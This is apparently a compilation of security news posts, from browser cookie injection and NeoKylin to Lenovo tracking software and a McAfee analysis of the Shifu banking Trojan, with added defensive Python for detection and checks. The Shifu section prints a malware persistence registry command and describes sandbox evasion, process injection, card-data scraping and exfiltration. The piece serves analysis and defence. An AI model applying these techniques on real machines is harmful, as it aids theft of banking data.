Affected Browsers:
The affected major web browsers include previous versions of:
Apple’s Safari
Mozilla’s Firefox
Google’s Chrome
Microsoft’s Internet Explorer
Microsoft’s Edge
However, the good news is that the vendors have now fixed the issue. So, if you want to protect yourself from this kind of cookie injection MitM (man-in-the-middle) attack vector, upgrade to the latest versions of these web browsers.
CERT also recommended that webmasters deploy HSTS (HTTP Strict Transport Security) on their top-level domain.
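A model of the browser-side behaviour described above, written as an added example (not code from the article, CERT or any browser vendor): a minimal RFC 6265 cookie jar in its pre-fix form, where the scheme a Set-Cookie arrived on is ignored, beside the "Leave Secure Cookies Alone" rule later adopted by browsers and standardised in RFC 6265bis. Host names and cookie values are constructed.

```python
from dataclasses import dataclass
from typing import Dict, Tuple


@dataclass
class Cookie:
    name: str
    value: str
    domain: str
    path: str
    secure: bool


def parse_set_cookie(header: str, request_host: str) -> Cookie:
    """Parse the subset of Set-Cookie used here: name=value plus the
    Domain, Path and Secure attributes (RFC 6265 section 5.2)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    domain, path, secure = request_host.lower(), "/", False
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "domain":
            domain = val.strip().lstrip(".").lower()
        elif key == "path":
            path = val.strip() or "/"
        elif key == "secure":
            secure = True
    return Cookie(name.strip(), value.strip(), domain, path, secure)


def domain_matches(host: str, cookie_domain: str) -> bool:
    """RFC 6265 domain-match: the host equals the cookie domain or is a subdomain of it."""
    return host == cookie_domain or host.endswith("." + cookie_domain)


class CookieJar:
    """Cookie store keyed by (name, domain, path), as RFC 6265 specifies.

    strict_secure=False models the pre-fix browsers the article describes: the
    scheme a Set-Cookie arrived on is never consulted, so a plain-HTTP response
    can create or replace a Secure cookie that is later sent over HTTPS.
    strict_secure=True models the fix later adopted by browsers: a response
    received over plain HTTP may neither create a Secure cookie nor replace or
    shadow an existing Secure cookie of the same name.
    """

    def __init__(self, strict_secure: bool) -> None:
        self.strict_secure = strict_secure
        self.store: Dict[Tuple[str, str, str], Cookie] = {}

    def set_from_response(self, scheme: str, host: str, header: str) -> bool:
        """Store the cookie carried by a Set-Cookie header; False means refused."""
        c = parse_set_cookie(header, host)
        if self.strict_secure and scheme != "https":
            if c.secure:
                return False
            for existing in self.store.values():
                if (existing.secure and existing.name == c.name
                        and (domain_matches(existing.domain, c.domain)
                             or domain_matches(c.domain, existing.domain))):
                    return False
        # Remaining gap: a plain-HTTP response can still plant a cookie before
        # the site has set its Secure one. That is why CERT also recommends HSTS:
        # with HSTS the browser never makes the plain-HTTP request at all.
        self.store[(c.name, c.domain, c.path)] = c
        return True

    def cookie_header(self, scheme: str, host: str, path: str) -> str:
        """Build the Cookie request header for a request to scheme://host/path.
        Longer paths are listed first, as browsers do, so a shadowing cookie
        would reach the server ahead of the genuine one."""
        sent = [c for c in self.store.values()
                if domain_matches(host, c.domain)
                and path.startswith(c.path)
                and (scheme == "https" or not c.secure)]
        sent.sort(key=lambda c: -len(c.path))
        return "; ".join(f"{c.name}={c.value}" for c in sent)


def demo() -> Tuple[str, str]:
    """Constructed scenario: the site sets its session cookie over HTTPS, then a
    plain-HTTP response for the same host (where an on-path party could speak)
    sets a cookie of the same name. Returns the Cookie header each jar would
    send with a subsequent HTTPS request."""
    genuine = "session=genuine; Secure; Path=/"      # constructed value
    injected = "session=injected; Secure; Path=/"    # constructed value
    headers = []
    for strict in (False, True):
        jar = CookieJar(strict_secure=strict)
        jar.set_from_response("https", "www.example.com", genuine)
        jar.set_from_response("http", "www.example.com", injected)
        headers.append(jar.cookie_header("https", "www.example.com", "/account"))
    return headers[0], headers[1]


if __name__ == "__main__":
    legacy, strict = demo()
    print("pre-fix browser sends:", legacy)   # session=injected
    print("fixed browser sends:  ", strict)   # session=genuine
```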

NeoKylin: China's Linux OS that Seriously Looks Like Windows XP

Did you know? China plans to eliminate all foreign technologies and services, such as Google and Facebook, by 2020.
It seems that in a few years China will be an entirely independent IT economy, building homegrown mobile and computer devices, operating systems, applications, browsers and almost everything else in the IT ecosystem.
China was not at all happy when Microsoft finally announced the end of official support for Windows XP. At the time, Windows held 91% of total market share, compared to just for Mac OS X and just 1% for Linux.
However, China wasn't interested in paying either for extended support for Windows XP or for switching to Windows 8. So, they decided to develop their own operating system.
Yes, China has developed a desktop operating system named “NeoKylin” (‘Kylin’ in Chinese), described as a substitute for Windows XP by Quartz, which got a hands-on look at the OS's “community version”.
NeoKylin is developed by the Shanghai-based China Standard Software Company and is already running on more than 40% of commercial units sold in the country by Dell.
NeoKylin Looks Like Windows XP
NeoKylin, the Microsoft Windows XP replacement, resembles it in the following ways:
The complete user interface and essentials like the window controls, XP’s classic Start button and the folder icons are exactly the same.
The folder names are also the same: there is a Recycle Bin, My Computer and Control Panel, to name a few.
The NeoShine Office Suite offers functionality similar to Windows Excel, Word and PowerPoint.
The classic rolling-hills-and-clouds desktop wallpaper from XP gets a new face with a qilin, the mythical chimera-like beast the OS is named after.
NeoKylin has Built-in Linux Terminal
Moreover, the Chinese OS has something more on board: a Linux terminal.
Yes, there is also a Linux terminal where commands can be run and information about the OS can be retrieved.
Beware! It is Not an Easy Going OS
While exploring NeoKylin, Quartz found that it has certain restrictions that do not allow any third-party installations on the system.
The operating system comes with pre-installed applications like:
Firefox for web browsing
A music player
An open-source image editor GIMP
A calculator
Besides these, the version on Dell systems comes packed with more applications and games.
However, when Quartz tried to install Google Chrome, NeoKylin blocked the installation. Moreover, according to Quartz, “It wasn’t just Chrome”.

However, the availability of Yellowdog Updater, Modified (Yum), a package manager common in Linux, allowed additional programs to be installed.
To Push Windows 10 in China, Microsoft Partners with Baidu
China’s reluctance to install Windows 8 raised a few eyebrows: some said it was because Windows 8 is expensive, while others cited suspicion over American spying as the reason Windows 8 couldn’t land in China.
China has always been cautious about the IT infrastructure of the country; even after updates and support ended, the 14-year-old Windows XP is still in use on the majority of systems in the country.
Though a small percentage of the Chinese government also uses Windows 7, that percentage might drop too now that their native OS is available.
China has always believed in accepting things on its own terms and conditions. This is borne out by its recent teaming up with Microsoft with the goal of pushing Windows 10 in China, but Microsoft Edge will ship with Baidu, China's domestic search engine, instead of Microsoft Bing.

Virus Bulletin small talk: Diversity in tech

Hardly a week goes by anymore between posts about the impending doom that will be brought about by a lack of science, technology, engineering and math (STEM) workers, particularly in the US. There are many who feel that the shortage is a myth. If you drill down further into different STEM disciplines, and into different specific demographics, the picture gets even more complex.
Top universities are saying that they’re graduating twice as many African American and Hispanic people with computer science degrees as are being hired. Women are statistically more likely to be unemployed from computer-related jobs than men are. This implies that there are considerably more people out there who are potential job candidates than are being hired.
But there are plenty of people who are worried about the existing “negative unemployment” rate in certain sectors of technology, particularly in information security. Certainly in the wake of ever-larger breaches in retail, healthcare, education and government, demand for talented defenders is significant.
What now?
Next week begins the 25th annual Virus Bulletin conference in Prague, Czech Republic, where my fellow researcher Stephen Cobb and I will be leading a discussion of this topic. We’ll be discussing a variety of aspects of this shortage, including whether improving diversity and the educational pipeline can help, whether we need to decrease burnout and turnover, and how people are going about changing things at various levels.
So if you’re at Virus Bulletin next week, please stop by and join our discussion. If you can’t be with us in Prague, you can also follow the conference and join the discussion on Twitter at #VB2015.

DHS working on ‘self-destructing’ security chip for smartphones

The Department for Homeland Security (DHS) in the US has revealed that it is working with the Boeing Company to develop a so-called “brain chip” that would allow any smartphone to “self-destruct”.
In theory, this technology will provide users with additional, “intelligent” security, so that in the event a smartphone is stolen or lost, the device will intuitively implement self-protective measures.
The chip would be able to detect unusual activity because it will have been gathering data on its user’s behaviour, including the way they walk and talk, Nextgov reported.
This information will have been generated organically, through an individual’s use of features such as a camera, microphone and touchpad.
Speaking to the online news provider, Vincent Sritapan, program manager for mobile security R&D at the DHS, said that the chip will have the capacity to “simulate human learning”.
The chip’s effectiveness will be tested on Boeing’s Black smartphone, which is aimed at government agencies and their contractors.
This particular smartphone has been designed with security professionals in mind and is considered to be one of the most impenetrable devices in the world.
Some of the unique features include a bespoke Android operating system, enhanced modularity to tailor its use to certain missions and “embedded hardware media encryption”.
“Despite the continuous innovation in commercial mobile technology, current devices are not designed from inception with the security and flexibility needed to match their evolving mission and enterprise environment,” Boeing states online.
The threat to smartphones has increased significantly over the last few years, with experts warning that the threats are becoming more complex.
Rolf von Roessing, former vice-president of security trade body ISACA, said in 2013 that one of the greatest challenges facing security professionals is dealing with the implications of greater interconnectedness.
He was quoted by Computer Weekly as saying: “Where there are clusters of wirelessly connected devices, it will become increasingly difficult to identify infections or where they have come from.”

Why parents must teach their children about internet security

Parenting, as we know it, is evolving in this modern, digital age.
Mothers and fathers have traditionally warned their sons and daughters of the physical dangers they face, be that pickpockets on the street or strangers in the park. Today, however, parents are facing an altogether different challenge – keeping their children safe on the world wide web.
Children of all ages now use the internet on a daily basis, for everything from Facebook and Instagram to shopping, gaming and streaming the latest TV shows. As a result, these youngsters are just as likely to suffer from cyberbullying as bullying, or from digital fraud as a pickpocket on the street.
However, despite this – and the never-ending news on cybercriminals, data breaches and cyber extortion – parents are still getting used to the internet and its hidden dangers.
Are parents doing enough to keep their children safe?
A recent NSPCC survey of more than 2,000 parents of children between eight and 13, carried out by YouGov, found that parents are avoiding conversations with their children about the need to stay safe online.
The poll reported that while 91 percent of eight-year-olds use the internet at least once a week, parents, on average, think that nine is a suitable age for children to be informed of the issues around online safety.
Even then, many are reluctant to take on this responsibility. For example, nearly a third (31 percent) of all surveyed parents admitted they would refer their child to another adult or sibling if they asked them questions about an issue they had experienced online.
Additionally, one in six (16 percent) said they were more confident giving advice to their child about staying safe in “real life” than staying safe online.
Online education is more important than ever before
Child welfare experts have warned that children are potentially missing out on vital online advice and support at a crucial time in their development, and have encouraged parents to speak up.
In the NSPCC’s study, of the 1,000 children surveyed whose parents had spoken to them about online safety, nearly two-thirds (60 percent) said that they had modified their online behavior as a result.
Without this kind of engagement from their parents, children may find themselves more at risk of online dangers – they simply do not have the skills or knowledge needed.
“Sadly we know that children up and down the country (UK) are struggling because of difficult experiences online,” Peter Wanless, CEO of the charity, commented at the time.
“Thousands of young people contact us about issues such as online grooming, cyberbullying and after viewing sites which encourage eating disorders, self-harm and suicide.
“We want to help parents recognize that for their children there is often no distinction between the online and offline world.”
Parents feel as though they are out of their depth
There is clearly a disconnect between parents and their children on internet safety, as another survey has demonstrated.
ESET reported that while 88 percent of parents were worried about what their children can access online, only a few had taken steps to safeguard their child’s online experience through the use of security software and parental controls on mobile devices.
The study, which was of 2,000 parents across the US and UK, found that 37 percent of children did not have security software on their mobile or tablet, with only 34 percent of parents having installed a parental control app.
When asked “What specifically concerns you when your child accesses the internet on a smartphone or tablet?” security concerns came out on top.
81 percent cited their child visiting inappropriate web pages as being the most troubling; 71 percent said it was their children forwarding personal details to strangers; while 61 percent highlighted excessive amounts of times spent on devices as being alarming.
There is a lot parents can do with little effort or difficulty
In spite of many mums and dads feeling ill-equipped or uneasy about explaining online safety, there really isn’t any need to be. Parents can in fact do a lot to help their children understand the risks, and fortunately a lot of this is straightforward.
For example, parents should encourage their children to use strong passwords and/or a password manager and to avoid clicking on suspicious links sent on social media or via email.
Youngsters should also be advised to be wary of entering sensitive information on unknown websites, which could be fake pages set up by cybercriminals.
Further, parents should explain the disadvantages of posting “too much” personal information on social networking sites (as this can be used by attackers for targeted phishing email campaigns).
Children that are the victim of cyberbullying should hold onto the abusive messages they’ve received in order to share these with their family, school and – if necessary – child support groups and the police. They should also use the ‘block user’ and ‘report user’ options on Facebook and Twitter.
If parents want to take things a step further, they could ensure their child’s computer has an up-to-date security solution, runs the latest software (reducing the likelihood of attackers exploiting software vulnerabilities) and backs up personal files to a hard disk drive or secure cloud service provider.
Towards a safer future
All of the above is just the tip of the iceberg and when it comes to educating children on online safety – there is so much more parents can do. Some intrepid mums and dads have their children using VPNs (virtual private networks), while others have urged their youngsters to use HTTPS websites for an encrypted web communication.
And, who knows, through the dialogue that parents have with their children, they may find that their advice strikes a “security chord”. Not only do they discover that there is an interest in this area, but a talent too. Luckily, there are plenty of ways of nurturing this flair.
But to get there, parents need to be active in broaching online safety with their children. Starting the conversation is the hardest part; but after breaking down this barrier, everything else is an opportunity.

The US military is still sending un-encrypted emails

The Motherboard news website recently published an interesting analysis of how the US military fails to protect its soldiers’ emails. How is that possible?
After the Edward Snowden case blew up in the US government's face, the US decided to create a task force to encrypt everything it could, urging the adoption of HTTPS for all government websites. A good idea, but there is still something missing from this process: email encryption.

In this specific case, the US military leaves their soldiers emails unencrypted, exposing them to possible interception by threat actors.

Chris Soghoian, principal technologist at the American Civil Liberties Union (ACLU), who has been trying for years to push the adoption of encryption, said something curious: “This is a pervasive problem in the government. And in many ways it affects the parts of the government that should be more focused on security—they’re doing it worse.”

For obvious reasons the military should be the one setting the example in terms of security, but surprisingly it isn’t alone in this: the Pentagon, including the Army, the Navy, the Defense Security Service and DARPA, is not using email encryption either.

Within the military only the Air Force is encrypting its emails, using STARTTLS.

STARTTLS is essentially a protocol extension that encrypts emails traveling from mail server to mail server; big companies (Google, for example) use it, helping to make encryption standard.

Even if you encrypt your emails, that doesn’t mean you are safe: if your email provider doesn’t use STARTTLS, you are only encrypting the email from your computer to your provider, meaning that after leaving your provider’s server it travels across the internet in clear text. This can be avoided with end-to-end encryption.

Let’s look at a practical example to visualize what happens when your email provider doesn’t support STARTTLS:

[Image: US military email encryption]

The red line means that after leaving your email provider’s server, the email is open to be read until it enters the recipient’s email provider.

When email providers support STARTTLS, every part of the email’s path is encrypted, as can be seen:

[Image: US military email encryption 2]
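A practitioner’s check for what the article describes, added here and not part of the original post: parse the extension list a mail server returns to EHLO and report whether STARTTLS is offered, with a live probe built on Python’s standard smtplib. The EHLO replies embedded below are constructed, and mail.example.test is a placeholder host.

```python
import smtplib
import socket
from typing import Dict, Set

# Constructed EHLO replies (not captured from any real server). The first line
# is the server greeting; each further line names one SMTP extension.
EHLO_WITH_STARTTLS = """250-mail.example.test Hello client.example.test
250-SIZE 35882577
250-8BITMIME
250-STARTTLS
250 ENHANCEDSTATUSCODES"""

EHLO_WITHOUT_STARTTLS = """250-mail.example.test Hello client.example.test
250-SIZE 10240000
250 8BITMIME"""


def parse_ehlo_extensions(response: str) -> Set[str]:
    """Return the extension keywords in a multi-line EHLO reply (RFC 5321 4.1.1.1).
    Lines look like '250-KEYWORD params' or, for the last one, '250 KEYWORD'."""
    exts: Set[str] = set()
    for line in response.splitlines()[1:]:   # skip the greeting line
        if not line.startswith("250"):
            continue                          # not part of a successful EHLO reply
        body = line[4:].strip()               # drop '250-' or '250 '
        if body:
            exts.add(body.split()[0].upper())
    return exts


def ehlo_offers_starttls(response: str) -> bool:
    """True when the server advertises the STARTTLS extension."""
    return "STARTTLS" in parse_ehlo_extensions(response)


def probe_starttls(mx_host: str, port: int = 25, timeout: float = 10.0) -> Dict[str, object]:
    """Live check against a mail server you are responsible for: connect, send
    EHLO, and report whether STARTTLS is offered and whether the upgrade to TLS
    actually succeeds. Uses only the standard library's smtplib."""
    result: Dict[str, object] = {"host": mx_host, "offered": False,
                                 "negotiated": False, "error": None}
    try:
        with smtplib.SMTP(mx_host, port, timeout=timeout) as smtp:
            smtp.ehlo()
            result["offered"] = smtp.has_extn("starttls")
            if result["offered"]:
                smtp.starttls()               # upgrade the connection to TLS
                smtp.ehlo()                   # re-EHLO over the encrypted channel
                result["negotiated"] = True
    except (smtplib.SMTPException, socket.error) as exc:
        result["error"] = str(exc)
    return result


if __name__ == "__main__":
    for label, reply in (("with", EHLO_WITH_STARTTLS), ("without", EHLO_WITHOUT_STARTTLS)):
        print(f"constructed reply {label} STARTTLS ->", ehlo_offers_starttls(reply))
```

STARTTLS is opportunistic: a server that offers it still accepts plain-text delivery, and an on-path party can strip the advertisement, so the probe shows what a sending server would see, not a guarantee that every hop is encrypted.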

I already reported that Google is using STARTTLS; what I haven’t told you is that they have been using it since the launch of Gmail in 2004, while other companies like Microsoft, Facebook, Twitter and Yahoo only implemented STARTTLS in 2014.

All this leads to the key point of the article: private companies are going in the right direction, but what about the US government? There the story is a bit different.

A spokesperson for the Defense Information Systems Agency (DISA), the Pentagon’s branch that oversees email and other technologies, said their Enterprise email doesn’t support STARTTLS.

“STARTTLS is an extension for the Post Office Protocol 3 and Internet Message Access protocols, which rely on username and password for system access. To remain compliant with DOD PKI policy, DEE does not support the use of username and password to grant access, and does not leverage either protocol.”

Commentators reacting to the spokesperson’s words said things like:

“an unacceptable and technically inept answer”

“I can’t think of a single technical reason why they wouldn’t use it”

Now let’s think again about the US military, and for that I will give a scenario: a US military unit goes to Afghanistan and the soldiers send emails; this means the soldiers’ emails could be intercepted by a foreign government that controls the internet infrastructure in that country.

There are more agencies not using this layer of security, like the FBI, the Office of the Director of National Intelligence (DNI) and the CIA, but it’s unclear why they don’t; the NSA, for example, is using STARTTLS.

The thing is, implementing STARTTLS is very cheap, and so it leads me to believe that the reason they aren’t using it may be related to other reasons that we can’t yet comprehend, but one thing is sure: STARTTLS should become a standard not only in the private domain, but also in the public (government) domain.

Lenovo Caught (3rd Time) Pre-Installing Spyware on its Laptops

Lenovo has once again been caught installing spyware on its laptops and workstations without the user's permission or knowledge.
One of the most popular computer manufacturers is being criticized for selling some refurbished laptop models pre-installed with invasive marketing software that sends users' data directly to the company.
This is not the first time Lenovo has allegedly installed spyware onto consumers' PCs.
Earlier this year, Lenovo was caught red-handed for selling laptops pre-installed with Superfish malware that opened up doors for hackers.
In August, Lenovo again got caught installing unwanted and non-removable crapware into part of the BIOS reserved for custom drivers.
Lenovo Laptops Come Pre-installed with 'Spyware'
Now, the Chinese computer manufacturer is making news once again for embedding tracking software into laptops and workstations from its ThinkPad, ThinkCentre and ThinkStation series.
Michael Horowitz from Computerworld has discovered a software program, called "Lenovo Customer Feedback Program 64," that runs daily on these systems and can be categorized as spyware.
The purpose of this program is to send customers' feedback data to Lenovo servers. According to Horowitz, the company has mentioned this in its EULA, but he "can not recall ever being asked [for] a Customer Feedback program" while ever setting up his Lenovo PC.
Horowitz also found that this program includes some other files, which are as follows:
One of these files belongs to Omniture, an online marketing and Web analytics company; it is included to track and monitor users' activities and send that data to the marketing agency.
Lenovo does mention on its website that there may be software programs installed on its systems that connect to its online servers, but it does not mention anything about sending your data for financial profit.
How to Remove Lenovo Spyware?
To remove 'Lenovo Customer Feedback Program 64' from your affected machines, you have to do it manually. Follow these simple steps:
Check your system type (whether it's a 32-bit or 64-bit version of Windows)
Download TaskSchedulerView
Now search your Lenovo PC for Lenovo Customer Feedback Program 64
Disable the Lenovo Customer Feedback Program 64 daily task so that it no longer runs
Additionally, you can also rename the "C:\Program Files (x86)\Lenovo" folder
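As an added example that is not part of the original article (nor Lenovo's software), the following Python performs the same steps from the command line: it reports the system type, finds the Lenovo Customer Feedback Program 64 task in the CSV that schtasks /Query /FO CSV /V prints, and builds the schtasks /Change ... /Disable command. The sample CSV is constructed and the agent's executable path is a placeholder.

```python
"""Find and disable the Lenovo Customer Feedback scheduled task from the command line.

Added example, not from the original article or from Lenovo. It parses the
CSV that `schtasks /Query /FO CSV /V` prints on Windows; the sample below is
constructed (the feedback agent's path is a placeholder) so the parsing logic
runs on any platform.
"""
import csv
import io
import platform
import subprocess

TARGET_TASK = "Lenovo Customer Feedback Program 64"

# Constructed excerpt of `schtasks /Query /FO CSV /V` output, columns trimmed.
SAMPLE_SCHTASKS_CSV = (
    '"HostName","TaskName","Status","Task To Run","Scheduled Task State"\n'
    '"THINKPAD-LAB","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Ready",'
    '"%windir%\\system32\\defrag.exe -c -h -o -$","Enabled"\n'
    '"THINKPAD-LAB","\\Lenovo\\Lenovo Customer Feedback Program 64","Ready",'
    '"C:\\Program Files (x86)\\Lenovo\\<placeholder-feedback-agent>.exe","Enabled"\n'
)


def system_type():
    """Step 1 of the article: report whether this is a 32-bit or 64-bit system."""
    return "64-bit" if platform.machine().lower().endswith("64") else "32-bit"


def find_tasks(schtasks_csv, needle=TARGET_TASK):
    """Return (task name, command) for every task whose name contains `needle`."""
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        if row["TaskName"] == "TaskName":      # schtasks may repeat the header per folder
            continue
        if needle.lower() in row["TaskName"].lower():
            hits.append((row["TaskName"], row["Task To Run"]))
    return hits


def disable_command(task_name):
    """The schtasks invocation equivalent to disabling the task in TaskSchedulerView."""
    return ["schtasks", "/Change", "/TN", task_name, "/Disable"]


def disable_on_live_host(dry_run=True):
    """Query the real scheduler (Windows only) and disable every matching task."""
    out = subprocess.run(["schtasks", "/Query", "/FO", "CSV", "/V"],
                         capture_output=True, text=True, check=True).stdout
    commands = [disable_command(name) for name, _cmd in find_tasks(out)]
    if not dry_run:
        for cmd in commands:
            subprocess.run(cmd, check=True)
    return commands


if __name__ == "__main__":
    print(system_type())
    for name, command in find_tasks(SAMPLE_SCHTASKS_CSV):
        print(name, "->", command)
        print(" ".join(disable_command(name)))
```

Run disable_on_live_host() first with the default dry run to see which tasks would be touched; the command lines it returns are the same ones TaskSchedulerView issues when you disable the task.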

Japanese Banking Trojan Shifu Combines Malware Tools

This post was prepared with the invaluable assistance of Rakesh Sharma.
In recent weeks, McAfee Labs has analyzed a recently discovered banking Trojan that combines elements from multiple malware tools. Shifu (“thief” in Japanese) has circulated since April and attacks primarily Japanese banks.
This malware arrives as a file dropped by other malware or as a file downloaded unknowingly by users visiting compromised sites. Upon installation the malware drops the following files:
%All Users Profile%\Application Data\{random}.tmp.bat
%Application Data%\{random characters} (contains logs of running applications and accessed applications)
It drops and executes the following file:
%All Users Profile%\Application Data\{random}.exe
The malware creates a Run registry entry to execute itself every time Windows starts: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IntelPowerAgent9 = rundll32.exe shell32.dll,ShellExec_RunDLL %All Users Profile%\Application Data\{random}.exe
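An added example (not from McAfee's post) that turns the persistence entry above into a triage check: it scores HKCU Run values for the rundll32 shell32.dll,ShellExec_RunDLL launcher pointing into a user-writable data directory. The value names and paths are constructed, and the random-name heuristic is an assumption rather than Shifu's actual naming scheme.

```python
"""Triage Run-key persistence entries for the rundll32 ShellExec_RunDLL pattern Shifu uses.

Added example, not from McAfee's post. The entries below are constructed from
the persistence details the article gives; the random-name heuristic is an
assumption, not Shifu's actual naming scheme.
"""
import re

# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Run values: (name, command).
RUN_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("IntelPowerAgent9",
     r"rundll32.exe shell32.dll,ShellExec_RunDLL C:\ProgramData\Application Data\kx83hd.exe"),
    ("VendorUpdater", r'"C:\Program Files\Vendor\updater.exe" /silent'),
]

# rundll32 launching an arbitrary file through shell32's ShellExec_RunDLL export.
SHELLEXEC_RE = re.compile(r"rundll32(?:\.exe)?\s+shell32\.dll\s*,\s*ShellExec_RunDLL", re.I)
# Directories any user or service can write to, where dropped payloads tend to live.
USER_WRITABLE_RE = re.compile(r"\\(?:ProgramData|Application Data|Temp)\\", re.I)
# Final path component of every .exe mentioned in the command line.
EXE_NAME_RE = re.compile(r"\\([^\\\s\"]+)\.exe\b", re.I)


def looks_random(stem):
    """Assumed heuristic: short alphanumeric stem mixing letters and digits."""
    return (5 <= len(stem) <= 8 and stem.isalnum()
            and any(c.isdigit() for c in stem) and any(c.isalpha() for c in stem))


def assess_run_entry(command):
    """Return the list of reasons a Run value deserves a closer look (empty if none)."""
    reasons = []
    if SHELLEXEC_RE.search(command):
        reasons.append("launched via rundll32 shell32.dll,ShellExec_RunDLL")
    if USER_WRITABLE_RE.search(command):
        reasons.append("target lives in a user-writable data directory")
    for stem in EXE_NAME_RE.findall(command):
        if looks_random(stem):
            reasons.append("executable name looks randomly generated: %s.exe" % stem)
    return reasons


def triage(entries):
    """Map value name -> reasons for every entry that raises at least one flag."""
    result = {}
    for name, command in entries:
        reasons = assess_run_entry(command)
        if reasons:
            result[name] = reasons
    return result


if __name__ == "__main__":
    for name, reasons in triage(RUN_ENTRIES).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Each reason on its own is weak (legitimate software also lives under ProgramData), which is why the check reports all of them and leaves the final call to the analyst; the Shifu-style entry trips all three.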
Obscuring techniques
This recently discovered malware family uses a large arsenal of tricks to avoid detection by traditional security solutions. It terminates itself if the computer name of the machine is SANDBOX or FORTINET.
It terminates itself if any of the following files are found:
The following image shows the malware searching for c:\sample\pos.exe.

The malware terminates if it is being debugged. The IsDebuggerPresent API detects whether the program is being debugged, and if it is, the malware can change its behavior. (We commonly find this API in malware samples.) Using these techniques, the malware developers are trying to make the malware analyst’s task more difficult. Shifu also uses the Sleep API, which can put the application to sleep for an infinite amount of time.



Shifu also performs an anti-automation check. Generally, on a normal system the foreground window changes when the user switches between tasks. In an automated analysis system, though, there is usually only a single task: running a possibly malicious sample and monitoring its behavior. The malware makes cunning use of this difference between the two types of systems. First, it calls GetForegroundWindow() and saves the handle of the window. After that it checks whether the foreground window has changed by continuously calling the same function. The rest of the code won’t execute until the window has changed.

Injecting asynchronous procedure calls
Thread creation usually requires overhead, so malware often uses asynchronous procedure call (APC) injection, which can invoke a function on an existing thread. These calls can direct a thread to execute some other code prior to resuming its regular execution path. The malware checks the running processes on infected systems via the CreateToolhelp32Snapshot method that PoS RAM scrapers commonly use. In the following snapshot we can see the malware looking for API calls such as CreateToolhelp32Snapshot (takes a snapshot of the specified processes, as well as the heaps, modules, and threads used by those processes), Process32First and Process32Next to find the target process. The malware retrieves the list of all processes and saves it in its own memory. One of the injected malicious code threads is responsible for periodically scraping the memory of active non-system processes on the infected machine for credit card information.
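As an added example (not McAfee's code), the following Python scores a sandbox API trace for the behaviours described in the obscuring-techniques and APC-injection passages: the debugger check, the foreground-window polling loop, the infinite Sleep, the Toolhelp process enumeration and an APC queueing call. The trace format and its lines are constructed; QueueUserAPC as the APC primitive is my assumption, since the article does not name the API.

```python
"""Score a sandbox API trace for the anti-analysis and injection behaviours described above.

Added example, not from McAfee's post. The trace format and the lines below
are constructed; real sandboxes emit their own formats, so adapt LINE_RE.
"""
import re
from collections import Counter

# Constructed API trace: "<seq> <api>(<args>) -> <return>".
API_TRACE = """\
0001 GetComputerNameA(buf, 16) -> "WIN7-LAB"
0002 IsDebuggerPresent() -> 0
0003 GetForegroundWindow() -> 0x1a0c4e
0004 GetForegroundWindow() -> 0x1a0c4e
0005 GetForegroundWindow() -> 0x1a0c4e
0006 GetForegroundWindow() -> 0x1a0c4e
0007 GetForegroundWindow() -> 0x1a0c4e
0008 GetForegroundWindow() -> 0x1a0c4e
0009 CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) -> 0x98
0010 Process32First(0x98, pe) -> 1
0011 Process32Next(0x98, pe) -> 1
0012 Process32Next(0x98, pe) -> 1
0013 OpenProcess(PROCESS_ALL_ACCESS, 0, 1644) -> 0xa4
0014 QueueUserAPC(0x00401000, 0xb0, 0) -> 1
0015 Sleep(0xFFFFFFFF) -> 0
"""

LINE_RE = re.compile(r"^\s*(\d+)\s+(\w+)\((.*?)\)\s*->\s*(.*)$")


def parse_trace(text):
    """Return a list of (api, args, return value) tuples, skipping unparseable lines."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append((m.group(2), m.group(3), m.group(4).strip()))
    return calls


def longest_repeat(calls, api):
    """Longest run of consecutive calls to `api` that return the same value."""
    best = run = 0
    prev = None
    for name, _args, ret in calls:
        if name == api and ret == prev:
            run += 1
        elif name == api:
            run = 1
        else:
            run = 0
        prev = ret if name == api else None
        best = max(best, run)
    return best


def analyze(calls, poll_threshold=5):
    """Map each suspicious behaviour to the evidence count found in the trace."""
    names = Counter(name for name, _, _ in calls)
    findings = {}
    if names["IsDebuggerPresent"]:
        findings["debugger_check"] = names["IsDebuggerPresent"]
    polls = longest_repeat(calls, "GetForegroundWindow")
    if polls >= poll_threshold:                 # user never switched windows
        findings["foreground_window_polling"] = polls
    for name, args, _ in calls:
        if name == "Sleep" and args.strip().lower() in ("0xffffffff", "infinite", "4294967295"):
            findings["infinite_sleep"] = True
    if names["CreateToolhelp32Snapshot"] and names["Process32First"] and names["Process32Next"]:
        findings["process_enumeration"] = names["Process32First"] + names["Process32Next"]
    if names["QueueUserAPC"]:
        findings["apc_injection"] = names["QueueUserAPC"]
    return findings


if __name__ == "__main__":
    for behaviour, evidence in analyze(parse_trace(API_TRACE)).items():
        print(behaviour, evidence)
```

A sandbox that simulates window switches (so the polling loop terminates) and feeds a non-matching computer name gets the sample past the checks the article lists; the scorer above is what you run on the resulting trace to document which checks were attempted.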

The malware uses HTTP POST requests to exfiltrate the stolen data it scrapes to a control server. Here the malware injects code into one of two running processes, explorer.exe or csrss.exe.
Shifu uses a domain generation algorithm (DGA) to create random domain names for covert botnet communications. Here’s a look at the traffic, which shows the generated random domain names:
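The DGA traffic itself is not reproduced on this page. As an added example (not McAfee's code), the following Python flags random-looking registered labels in a constructed DNS query log using character entropy, vowel ratio, digit presence and the longest non-vowel run. The log lines and the scoring thresholds are illustrative assumptions and do not reproduce Shifu's actual algorithm.

```python
"""Flag DNS queries for random-looking (DGA-style) domains in a query log.

Added example, not part of McAfee's post: the log lines are constructed and
the scoring thresholds are illustrative assumptions, not Shifu's actual DGA.
"""
import math
from collections import Counter

# Constructed DNS query log: "<timestamp> <client> <qtype> <name>".
DNS_LOG = """\
2015-09-24T10:01:02Z 10.0.0.12 A www.microsoft.com
2015-09-24T10:01:05Z 10.0.0.12 A mail.google.com
2015-09-24T10:01:09Z 10.0.0.12 A stackoverflow.com
2015-09-24T10:01:11Z 10.0.0.12 A qxvmzkp7hlw2t.com
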